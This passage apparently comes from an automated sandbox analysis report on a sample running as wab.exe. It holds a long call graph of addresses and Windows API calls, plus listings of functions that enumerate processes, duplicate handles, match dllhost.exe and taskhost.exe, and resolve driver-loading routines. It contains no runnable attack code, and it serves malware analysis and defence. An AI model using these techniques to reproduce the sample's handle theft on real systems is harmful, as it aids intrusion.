40bc2e 39531->39532 39533 40bd43 39532->39533 39534 40b2cc 27 API calls 39532->39534 39535 40cc0c 4 API calls 39533->39535 39536 40bc40 39534->39536 39535->39520 39594 40ccf0 _wcsicmp 39536->39594 39538 40bc46 39538->39533 39539 40bc61 memset memset WideCharToMultiByte 39538->39539 39595 40103c strlen 39539->39595 39541 40bcc0 39542 40b273 27 API calls 39541->39542 39543 40bcd0 memcmp 39542->39543 39543->39533 39544 40bce2 39543->39544 39545 404423 38 API calls 39544->39545 39546 40bd10 39545->39546 39546->39533 39547 40bd3a LocalFree 39546->39547 39548 40bd1f memcpy 39546->39548 39547->39533 39548->39547 39549->38710 39551 409a74 GetTempFileNameW 39550->39551 39552 409a66 GetWindowsDirectoryW 39550->39552 39551->38709 39552->39551 39553->38748 39554->38748 39555->38748 39556->38748 39557->38748 39558->38748 39559->38748 39560->38748 39561->38748 39562->38723 39563->38745 39596 4096c3 CreateFileW 39564->39596 39566 40cc34 39567 40cc3d GetFileSize 39566->39567 39569 40bbca 39566->39569 39568 40afcf 2 API calls 39567->39568 39570 40cc64 39568->39570 39569->39520 39576 40cf04 39569->39576 39597 40a2ef ReadFile 39570->39597 39572 40cc71 39598 40ab4a MultiByteToWideChar 39572->39598 39574 40cc95 FindCloseChangeNotification 39575 40b04b ??3@YAXPAX 39574->39575 39575->39569 39577 40b633 ??3@YAXPAX 39576->39577 39578 40cf14 39577->39578 39604 40b1ab ??3@YAXPAX ??3@YAXPAX 39578->39604 39580 40bbdd 39580->39520 39580->39525 39581 40cf1b 39581->39580 39583 40cfef 39581->39583 39605 40cd4b 39581->39605 39584 40cd4b 14 API calls 39583->39584 39584->39580 39586 40b633 ??3@YAXPAX 39585->39586 39587 40cc15 39586->39587 39588 40aa04 ??3@YAXPAX 39587->39588 39589 40cc1d 39588->39589 39654 40b1ab ??3@YAXPAX ??3@YAXPAX 39589->39654 39591 40b7d4 memset CreateFileW 39591->38702 39591->38703 39592->39528 39593->39530 39594->39538 39595->39541 39596->39566 39597->39572 39599 40ab6b 39598->39599 39603 40ab93 39598->39603 39600 40a9ce 4 API calls 39599->39600 39601 40ab74 39600->39601 39602 40ab7c MultiByteToWideChar 39601->39602 39602->39603 39603->39574 39604->39581 39606 40cd7b 39605->39606 39639 40aa29 39606->39639 39608 40cef5 39609 40aa04 ??3@YAXPAX 39608->39609 39610 40cefd 39609->39610 39610->39581 39612 40aa29 6 API calls 39613 40ce1d 39612->39613 39614 40aa29 6 API calls 39613->39614 39615 40ce3e 39614->39615 39616 40ce6a 39615->39616 39647 40abb7 wcslen memmove 39615->39647 39617 40ce9f 39616->39617 39650 40abb7 wcslen memmove 39616->39650 39619 40a8d0 7 API calls 39617->39619 39622 40ceb5 39619->39622 39620 40ce56 39648 40aa71 wcslen 39620->39648 39629 40a8d0 7 API calls 39622->39629 39624 40ce8b 39651 40aa71 wcslen 39624->39651 39625 40ce5e 39649 40abb7 wcslen memmove 39625->39649 39627 40ce93 39652 40abb7 wcslen memmove 39627->39652 39631 40cecb 39629->39631 39653 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39631->39653 39633 40cedd 39634 40aa04 ??3@YAXPAX 39633->39634 39635 40cee5 39634->39635 39636 40aa04 ??3@YAXPAX 39635->39636 39637 40ceed 39636->39637 39638 40aa04 ??3@YAXPAX 39637->39638 39638->39608 39640 40aa33 39639->39640 39646 40aa63 39639->39646 39641 40aa44 39640->39641 39642 40aa38 wcslen 39640->39642 39643 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39641->39643 39642->39641 39644 40aa4d 39643->39644 39645 40aa51 memcpy 39644->39645 39644->39646 39645->39646 39646->39608 39646->39612 39647->39620 39648->39625 39649->39616 39650->39624 39651->39627 39652->39617 39653->39633 39654->39591 39655->38764 39656->38771 37535 44dea5 37536 44deb5 FreeLibrary 37535->37536 37537 44dec3 37535->37537 37536->37537 39666 4148b6 FindResourceW 39667 4148cf SizeofResource 39666->39667 39670 4148f9 39666->39670 39668 4148e0 LoadResource 39667->39668 39667->39670 39669 4148ee LockResource 39668->39669 39668->39670 39669->39670 37711 415304 ??3@YAXPAX 39671 441b3f 39681 43a9f6 39671->39681 39673 441b61 39854 4386af memset 39673->39854 39675 44189a 39676 442bd4 39675->39676 39677 4418e2 39675->39677 39678 4418ea 39676->39678 39856 441409 memset 39676->39856 39677->39678 39855 4414a9 12 API calls 39677->39855 39682 43aa20 39681->39682 39683 43aadf 39681->39683 39682->39683 39684 43aa34 memset 39682->39684 39683->39673 39685 43aa56 39684->39685 39686 43aa4d 39684->39686 39857 43a6e7 39685->39857 39865 42c02e memset 39686->39865 39691 43aad3 39867 4169a7 11 API calls 39691->39867 39692 43aaae 39692->39683 39692->39691 39707 43aae5 39692->39707 39693 43ac18 39696 43ac47 39693->39696 39869 42bbd5 memcpy memcpy memcpy memset memcpy 39693->39869 39697 43aca8 39696->39697 39870 438eed 16 API calls 39696->39870 39700 43acd5 39697->39700 39872 4233ae 11 API calls 39697->39872 39873 423426 11 API calls 39700->39873 39701 43ac87 39871 4233c5 16 API calls 39701->39871 39705 43ace1 39874 439811 163 API calls 39705->39874 39706 43a9f6 161 API calls 39706->39707 39707->39683 39707->39693 39707->39706 39868 439bbb 22 API calls 39707->39868 39709 43acfd 39714 43ad2c 39709->39714 39875 438eed 16 API calls 39709->39875 39711 43ad19 39876 4233c5 16 API calls 39711->39876 39712 43ad58 39877 44081d 163 API calls 39712->39877 39714->39712 39718 43add9 39714->39718 39717 43ae3a memset 39719 43ae73 39717->39719 39718->39718 39881 423426 11 API calls 39718->39881 39882 42e1c0 147 API calls 39719->39882 39720 43adab 39879 438c4e 163 API calls 39720->39879 39723 43ad6c 39723->39683 39723->39720 39878 42370b memset memcpy memset 39723->39878 39725 43adcc 39880 440f84 12 API calls 39725->39880 39726 43ae96 39883 42e1c0 147 API calls 39726->39883 39729 43aea8 39730 43aec1 39729->39730 39884 42e199 147 API calls 39729->39884 39731 43af00 39730->39731 39885 42e1c0 147 API calls 39730->39885 39731->39683 39735 43af1a 39731->39735 39736 43b3d9 39731->39736 39886 438eed 16 API calls 39735->39886 39741 43b3f6 39736->39741 39745 43b4c8 39736->39745 39738 43b60f 39738->39683 39945 4393a5 17 API calls 39738->39945 39740 43af2f 39887 4233c5 16 API calls 39740->39887 39927 432878 12 API calls 39741->39927 39743 43af51 39888 423426 11 API calls 39743->39888 39757 43b4f2 39745->39757 39933 42bbd5 memcpy memcpy memcpy memset memcpy 39745->39933 39747 43af7d 39889 423426 11 API calls 39747->39889 39751 43b529 39935 44081d 163 API calls 39751->39935 39752 43af94 39890 423330 11 API calls 39752->39890 39756 43afca 39891 423330 11 API calls 39756->39891 39934 43a76c 21 API calls 39757->39934 39758 43b47e 39761 43b497 39758->39761 39930 42374a memcpy memset memcpy memcpy memcpy 39758->39930 39759 43b544 39762 43b55c 39759->39762 39936 42c02e memset 39759->39936 39931 4233ae 11 API calls 39761->39931 39937 43a87a 163 API calls 39762->39937 39763 43afdb 39892 4233ae 11 API calls 39763->39892 39768 43b428 39779 43b462 39768->39779 39928 432b60 16 API calls 39768->39928 39770 43b56c 39773 43b58a 39770->39773 39938 423330 11 API calls 39770->39938 39771 43b4b1 39932 423399 11 API calls 39771->39932 39772 43afee 39893 44081d 163 API calls 39772->39893 39939 440f84 12 API calls 39773->39939 39775 43b4c1 39941 42db80 163 API calls 39775->39941 39929 423330 11 API calls 39779->39929 39781 43b592 39940 43a82f 16 API calls 39781->39940 39784 43b5b4 39942 438c4e 163 API calls 39784->39942 39786 43b5cf 39943 42c02e memset 39786->39943 39788 43b005 39788->39683 39792 43b01f 39788->39792 39894 42d836 163 API calls 39788->39894 39789 43b1ef 39904 4233c5 16 API calls 39789->39904 39792->39789 39902 423330 11 API calls 39792->39902 39903 42d71d 163 API calls 39792->39903 39793 43b212 39905 423330 11 API calls 39793->39905 39794 43b087 39895 4233ae 11 API calls 39794->39895 39795 43add4 39795->39738 39944 438f86 16 API calls 39795->39944 39799 43b22a 39906 42ccb5 11 API calls 39799->39906 39802 43b23f 39907 4233ae 11 API calls 39802->39907 39803 43b10f 39898 423330 11 API calls 39803->39898 39805 43b257 39908 4233ae 11 API calls 39805->39908 39809 43b129 39899 4233ae 11 API calls 39809->39899 39810 43b26e 39909 4233ae 11 API calls 39810->39909 39813 43b09a 39813->39803 39896 42cc15 19 API calls 39813->39896 39897 4233ae 11 API calls 39813->39897 39814 43b282 39910 43a87a 163 API calls 39814->39910 39816 43b13c 39900 440f84 12 API calls 39816->39900 39818 43b29d 39911 423330 11 API calls 39818->39911 39821 43b15f 39901 4233ae 11 API calls 39821->39901 39822 43b2af 39824 43b2b8 39822->39824 39825 43b2ce 39822->39825 39912 4233ae 11 API calls 39824->39912 39913 440f84 12 API calls 39825->39913 39828 43b2c9 39915 4233ae 11 API calls 39828->39915 39829 43b2da 39914 42370b memset memcpy memset 39829->39914 39832 43b2f9 39916 423330 11 API calls 39832->39916 39834 43b30b 39917 423330 11 API calls 39834->39917 39836 43b325 39918 423399 11 API calls 39836->39918 39838 43b332 39919 4233ae 11 API calls 39838->39919 39840 43b354 39920 423399 11 API calls 39840->39920 39842 43b364 39921 43a82f 16 API calls 39842->39921 39844 43b370 39922 42db80 163 API calls 39844->39922 39846 43b380 39923 438c4e 163 API calls 39846->39923 39848 43b39e 39924 423399 11 API calls 39848->39924 39850 43b3ae 39925 43a76c 21 API calls 39850->39925 39852 43b3c3 39926 423399 11 API calls 39852->39926 39854->39675 39855->39678 39856->39676 39858 43a6f5 39857->39858 39864 43a765 39857->39864 39858->39864 39946 42a115 39858->39946 39862 43a73d 39863 42a115 147 API calls 39862->39863 39862->39864 39863->39864 39864->39683 39866 4397fd memset 39864->39866 39865->39685 39866->39692 39867->39683 39868->39707 39869->39696 39870->39701 39871->39697 39872->39700 39873->39705 39874->39709 39875->39711 39876->39714 39877->39723 39878->39720 39879->39725 39880->39795 39881->39717 39882->39726 39883->39729 39884->39730 39885->39730 39886->39740 39887->39743 39888->39747 39889->39752 39890->39756 39891->39763 39892->39772 39893->39788 39894->39794 39895->39813 39896->39813 39897->39813 39898->39809 39899->39816 39900->39821 39901->39792 39902->39792 39903->39792 39904->39793 39905->39799 39906->39802 39907->39805 39908->39810 39909->39814 39910->39818 39911->39822 39912->39828 39913->39829 39914->39828 39915->39832 39916->39834 39917->39836 39918->39838 39919->39840 39920->39842 39921->39844 39922->39846 39923->39848 39924->39850 39925->39852 39926->39795 39927->39768 39928->39779 39929->39758 39930->39761 39931->39771 39932->39775 39933->39757 39934->39751 39935->39759 39936->39762 39937->39770 39938->39773 39939->39781 39940->39775 39941->39784 39942->39786 39943->39795 39944->39738 39945->39683 39947 42a175 39946->39947 39949 42a122 39946->39949 39947->39864 39952 42b13b 147 API calls 39947->39952 39949->39947 39950 42a115 147 API calls 39949->39950 39953 43a174 39949->39953 39977 42a0a8 147 API calls 39949->39977 39950->39949 39952->39862 39967 43a196 39953->39967 39968 43a19e 39953->39968 39954 43a306 39954->39967 39986 4388c4 14 API calls 39954->39986 39957 42a115 147 API calls 39957->39968 39959 43a642 39959->39967 40007 4169a7 11 API calls 39959->40007 39963 43a635 40006 42c02e memset 39963->40006 39967->39949 39968->39954 39968->39957 39968->39967 39978 42ff8c 39968->39978 39994 415a91 39968->39994 39998 4165ff 39968->39998 40001 439504 13 API calls 39968->40001 40002 4312d0 147 API calls 39968->40002 40003 42be4c memcpy memcpy memcpy memset memcpy 39968->40003 40004 43a121 11 API calls 39968->40004 39970 4169a7 11 API calls 39971 43a325 39970->39971 39971->39959 39971->39963 39971->39967 39971->39970 39972 42b5b5 memset memcpy 39971->39972 39973 42bf4c 14 API calls 39971->39973 39976 4165ff 11 API calls 39971->39976 39987 42b63e 39971->39987 40005 42bfcf memcpy 39971->40005 39972->39971 39973->39971 39976->39971 39977->39949 40008 43817e 39978->40008 39980 42ff99 39981 42ffe3 39980->39981 39982 42ffd0 39980->39982 39985 42ff9d 39980->39985 40013 4169a7 11 API calls 39981->40013 40012 4169a7 11 API calls 39982->40012 39985->39968 39986->39971 40162 42b4ec 39987->40162 39989 42b64c 40168 42b5e4 memset 39989->40168 39991 42b65e 39992 42b66d 39991->39992 40169 42b3c6 11 API calls 39991->40169 39992->39971 39995 415a9d 39994->39995 39996 415ab3 39995->39996 39997 415aa4 memset 39995->39997 39996->39968 39997->39996 40170 4165a0 39998->40170 40001->39968 40002->39968 40003->39968 40004->39968 40005->39971 40006->39959 40007->39967 40009 438187 40008->40009 40011 438192 40008->40011 40014 4380f6 40009->40014 40011->39980 40012->39985 40013->39985 40016 43811f 40014->40016 40015 438164 40015->40011 40016->40015 40019 437e5e 40016->40019 40042 4300e8 memset memset memcpy 40016->40042 40043 437d3c 40019->40043 40021 437eb3 40021->40016 40022 437ea9 40022->40021 40027 437f22 40022->40027 40058 41f432 40022->40058 40025 437f06 40105 415c56 11 API calls 40025->40105 40029 437f7f 40027->40029 40030 432d4e 3 API calls 40027->40030 40028 437f95 40106 415c56 11 API calls 40028->40106 40029->40028 40031 43802b 40029->40031 40030->40029 40034 4165ff 11 API calls 40031->40034 40033 437fa3 40033->40021 40109 41f638 104 API calls 40033->40109 40035 438054 40034->40035 40069 437371 40035->40069 40038 43806b 40040 438094 40038->40040 40107 42f50e 138 API calls 40038->40107 40040->40033 40108 4300e8 memset memset memcpy 40040->40108 40042->40016 40044 437d69 40043->40044 40046 437d80 40043->40046 40110 437ccb 11 API calls 40044->40110 40047 437da3 40046->40047 40049 437d90 40046->40049 40050 437d76 40046->40050 40051 438460 134 API calls 40047->40051 40049->40050 40114 437ccb 11 API calls 40049->40114 40050->40022 40054 437dcb 40051->40054 40052 437de8 40113 424f26 123 API calls 40052->40113 40054->40052 40111 444283 13 API calls 40054->40111 40056 437dfc 40112 437ccb 11 API calls 40056->40112 40059 41f54d 40058->40059 40064 41f44f 40058->40064 40060 41f466 40059->40060 40144 41c635 memset memset 40059->40144 40060->40025 40060->40027 40064->40060 40067 41f50b 40064->40067 40115 41f1a5 40064->40115 40140 41c06f memcmp 40064->40140 40141 41f3b1 90 API calls 40064->40141 40142 41f398 86 API calls 40064->40142 40067->40059 40067->40060 40143 41c295 86 API calls 40067->40143 40145 41703f 40069->40145 40071 437399 40072 43739d 40071->40072 40074 4373ac 40071->40074 40152 4446ea 11 API calls 40072->40152 40075 416935 16 API calls 40074->40075 40091 4373ca 40075->40091 40076 437584 40078 4375bc 40076->40078 40159 42453e 123 API calls 40076->40159 40077 438460 134 API calls 40077->40091 40080 415c7d 16 API calls 40078->40080 40081 4375d2 40080->40081 40083 4442e6 11 API calls 40081->40083 40085 4373a7 40081->40085 40082 4251c4 137 API calls 40082->40091 40084 4375e2 40083->40084 40084->40085 40160 444283 13 API calls 40084->40160 40085->40038 40087 415a91 memset 40087->40091 40090 43758f 40158 42453e 123 API calls 40090->40158 40091->40076 40091->40077 40091->40082 40091->40087 40091->40090 40104 437d3c 135 API calls 40091->40104 40153 425433 13 API calls 40091->40153 40154 425413 17 API calls 40091->40154 40155 42533e 16 API calls 40091->40155 40156 42538f 16 API calls 40091->40156 40157 42453e 123 API calls 40091->40157 40094 4375f4 40098 437620 40094->40098 40099 43760b 40094->40099 40096 43759f 40097 416935 16 API calls 40096->40097 40097->40076 40100 416935 16 API calls 40098->40100 40161 444283 13 API calls 40099->40161 40100->40085 40103 437612 memcpy 40103->40085 40104->40091 40105->40021 40106->40033 40107->40040 40108->40033 40109->40021 40110->40050 40111->40056 40112->40052 40113->40050 40114->40050 40116 41bc3b 101 API calls 40115->40116 40117 41f1b4 40116->40117 40118 41edad 86 API calls 40117->40118 40125 41f282 40117->40125 40119 41f1cb 40118->40119 40120 41f1f5 memcmp 40119->40120 40121 41f20e 40119->40121 40119->40125 40120->40121 40122 41f21b memcmp 40121->40122 40121->40125 40123 41f326 40122->40123 40126 41f23d 40122->40126 40124 41ee6b 86 API calls 40123->40124 40123->40125 40124->40125 40125->40064 40126->40123 40127 41f28e memcmp 40126->40127 40129 41c8df 56 API calls 40126->40129 40127->40123 40128 41f2a9 40127->40128 40128->40123 40131 41f308 40128->40131 40132 41f2d8 40128->40132 40130 41f269 40129->40130 40130->40123 40133 41f287 40130->40133 40134 41f27a 40130->40134 40131->40123 40138 4446ce 11 API calls 40131->40138 40135 41ee6b 86 API calls 40132->40135 40133->40127 40136 41ee6b 86 API calls 40134->40136 40137 41f2e0 40135->40137 40136->40125 40139 41b1ca memset 40137->40139 40138->40123 40139->40125 40140->40064 40141->40064 40142->40064 40143->40059 40144->40060 40146 417044 40145->40146 40147 41705c 40145->40147 40149 416760 11 API calls 40146->40149 40151 417055 40146->40151 40148 417075 40147->40148 40150 41707a 11 API calls 40147->40150 40148->40071 40149->40151 40150->40146 40151->40071 40152->40085 40153->40091 40154->40091 40155->40091 40156->40091 40157->40091 40158->40096 40159->40078 40160->40094 40161->40103 40164 42b4ff 40162->40164 40163 415a91 memset 40165 42b52c 40163->40165 40164->40163 40166 42b553 memcpy 40165->40166 40167 42b545 40165->40167 40166->40167 40167->39989 40168->39991 40169->39992 40175 415cfe 40170->40175 40176 41628e 40175->40176 40180 415d23 __aullrem __aulldvrm 40175->40180 40183 416520 40176->40183 40177 4163ca 40189 416422 11 API calls 40177->40189 40179 416172 memset 40179->40180 40180->40176 40180->40177 40180->40179 40181 416422 10 API calls 40180->40181 40182 415cb9 10 API calls 40180->40182 40181->40180 40182->40180 40184 416527 40183->40184 40188 416574 40183->40188 40186 416544 40184->40186 40184->40188 40190 4156aa 11 API calls 40184->40190 40187 416561 memcpy 40186->40187 40186->40188 40187->40188 40188->39968 40189->40176 40190->40186 40212 41493c EnumResourceNamesW 37539 4287c1 37540 4287d2 37539->37540 37541 429ac1 37539->37541 37542 428818 37540->37542 37543 42881f 37540->37543 37549 425711 37540->37549 37558 425ad6 37541->37558 37609 415c56 11 API calls 37541->37609 37576 42013a 37542->37576 37604 420244 97 API calls 37543->37604 37548 4260dd 37603 424251 120 API calls 37548->37603 37549->37541 37551 4259da 37549->37551 37556 422aeb memset memcpy memcpy 37549->37556 37557 429a4d 37549->37557 37562 4260a1 37549->37562 37572 4259c2 37549->37572 37575 425a38 37549->37575 37592 4227f0 memset memcpy 37549->37592 37593 422b84 15 API calls 37549->37593 37594 422b5d memset memcpy memcpy 37549->37594 37595 422640 13 API calls 37549->37595 37597 4241fc 11 API calls 37549->37597 37598 42413a 90 API calls 37549->37598 37602 416760 11 API calls 37551->37602 37556->37549 37559 429a66 37557->37559 37560 429a9b 37557->37560 37605 415c56 11 API calls 37559->37605 37564 429a96 37560->37564 37607 416760 11 API calls 37560->37607 37601 415c56 11 API calls 37562->37601 37608 424251 120 API calls 37564->37608 37566 429a7a 37606 416760 11 API calls 37566->37606 37572->37558 37596 415c56 11 API calls 37572->37596 37575->37572 37599 422640 13 API calls 37575->37599 37600 4226e0 12 API calls 37575->37600 37577 42014c 37576->37577 37580 420151 37576->37580 37619 41e466 97 API calls 37577->37619 37579 420162 37579->37549 37580->37579 37581 4201b3 37580->37581 37582 420229 37580->37582 37583 4201b8 37581->37583 37584 4201dc 37581->37584 37582->37579 37585 41fd5e 86 API calls 37582->37585 37610 41fbdb 37583->37610 37584->37579 37588 4201ff 37584->37588 37616 41fc4c 37584->37616 37585->37579 37588->37579 37591 42013a 97 API calls 37588->37591 37591->37579 37592->37549 37593->37549 37594->37549 37595->37549 37596->37551 37597->37549 37598->37549 37599->37575 37600->37575 37601->37551 37602->37548 37603->37558 37604->37549 37605->37566 37606->37564 37607->37564 37608->37541 37609->37551 37611 41fbf8 37610->37611 37614 41fbf1 37610->37614 37624 41ee26 37611->37624 37615 41fc39 37614->37615 37634 4446ce 11 API calls 37614->37634 37615->37579 37620 41fd5e 37615->37620 37617 41ee6b 86 API calls 37616->37617 37618 41fc5d 37617->37618 37618->37584 37619->37580 37622 41fd65 37620->37622 37621 41fdab 37621->37579 37622->37621 37623 41fbdb 86 API calls 37622->37623 37623->37622 37625 41ee41 37624->37625 37626 41ee32 37624->37626 37635 41edad 37625->37635 37638 4446ce 11 API calls 37626->37638 37629 41ee3c 37629->37614 37632 41ee58 37632->37629 37640 41ee6b 37632->37640 37634->37615 37644 41be52 37635->37644 37638->37629 37639 41eb85 11 API calls 37639->37632 37641 41ee70 37640->37641 37642 41ee78 37640->37642 37697 41bf99 86 API calls 37641->37697 37642->37629 37645 41be6f 37644->37645 37646 41be5f 37644->37646 37652 41be8c 37645->37652 37676 418c63 memset memset 37645->37676 37675 4446ce 11 API calls 37646->37675 37649 41bee7 37650 41be69 37649->37650 37680 41a453 86 API calls 37649->37680 37650->37629 37650->37639 37652->37649 37652->37650 37653 41bf3a 37652->37653 37654 41bed1 37652->37654 37679 4446ce 11 API calls 37653->37679 37656 41bef0 37654->37656 37659 41bee2 37654->37659 37656->37649 37657 41bf01 37656->37657 37658 41bf24 memset 37657->37658 37660 41bf14 37657->37660 37677 418a6d memset memcpy memset 37657->37677 37658->37650 37665 41ac13 37659->37665 37678 41a223 memset memcpy memset 37660->37678 37664 41bf20 37664->37658 37666 41ac52 37665->37666 37667 41ac3f memset 37665->37667 37669 41ac6a 37666->37669 37681 41dc14 19 API calls 37666->37681 37672 41acd9 37667->37672 37671 41aca1 37669->37671 37682 41519d 37669->37682 37671->37672 37673 41acc0 memset 37671->37673 37674 41accd memcpy 37671->37674 37672->37649 37673->37672 37674->37672 37675->37650 37676->37652 37677->37660 37678->37664 37679->37649 37681->37669 37685 4175ed 37682->37685 37693 417570 SetFilePointer 37685->37693 37688 41760a ReadFile 37689 417637 37688->37689 37690 417627 GetLastError 37688->37690 37691 4151b3 37689->37691 37692 41763e memset 37689->37692 37690->37691 37691->37671 37692->37691 37694 4175b2 37693->37694 37695 41759c GetLastError 37693->37695 37694->37688 37694->37691 37695->37694 37696 4175a8 GetLastError 37695->37696 37696->37694 37697->37642 37698 417bc5 37699 417c61 37698->37699 37700 417bda 37698->37700 37700->37699 37701 417bf6 UnmapViewOfFile CloseHandle 37700->37701 37703 417c2c 37700->37703 37705 4175b7 37700->37705 37701->37700 37701->37701 37703->37700 37710 41851e 20 API calls 37703->37710 37706 4175d6 FindCloseChangeNotification 37705->37706 37707 4175c8 37706->37707 37708 4175df 37706->37708 37707->37708 37709 4175ce Sleep 37707->37709 37708->37700 37709->37706 37710->37703 39657 4147f3 39660 414561 39657->39660 39659 414813 39661 41456d 39660->39661 39662 41457f GetPrivateProfileIntW 39660->39662 39665 4143f1 memset _itow WritePrivateProfileStringW 39661->39665 39662->39659 39664 41457a 39664->39659 39665->39664

                                                              Executed Functions

                                                              Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                              • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                              • memset.MSVCRT ref: 0040DF5F
                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                              • API String ID: 594330280-3398334509
                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                              Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 600 413e6a-413e76 596->600 597->596 602 413e46-413e5c GetProcAddress 597->602 598->599 599->580 600->592 602->596 604->583
                                                              APIs
                                                                • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                              • memset.MSVCRT ref: 00413D7F
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                              • memset.MSVCRT ref: 00413E07
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
